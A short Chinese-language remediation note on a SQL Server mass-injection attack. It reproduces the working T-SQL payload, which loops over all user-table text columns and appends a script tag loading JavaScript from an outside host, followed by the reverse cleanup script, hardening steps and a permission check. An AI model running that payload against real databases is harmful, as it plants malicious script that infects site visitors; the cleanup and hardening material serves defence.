注入操作：
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where

A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or

B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C

While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert

(Varchar(8000),['+@C+']))+''<script

src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

消除注入代碼的逆操作SQL

Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where

A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or

B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C

While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=replace

(['+@C+'],''<script

src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

徹底杜絕SQL注入

1、不要使用sa用戶連接數(shù)據(jù)庫。
2、新建一個public權(quán)限數(shù)據(jù)庫用戶，并用這個用戶訪問數(shù)據(jù)庫。
3、[角色]去掉角色public對sysobjects與syscolumns對象的select訪問權(quán)限 。
4、[用戶]用戶名稱-> 右鍵－屬性－權(quán)限－在sysobjects與syscolumns上面打“×”。
5、通過以下代碼檢測（失敗表示權(quán)限正確，如能顯示出來則表明權(quán)限太高）：
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and

(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor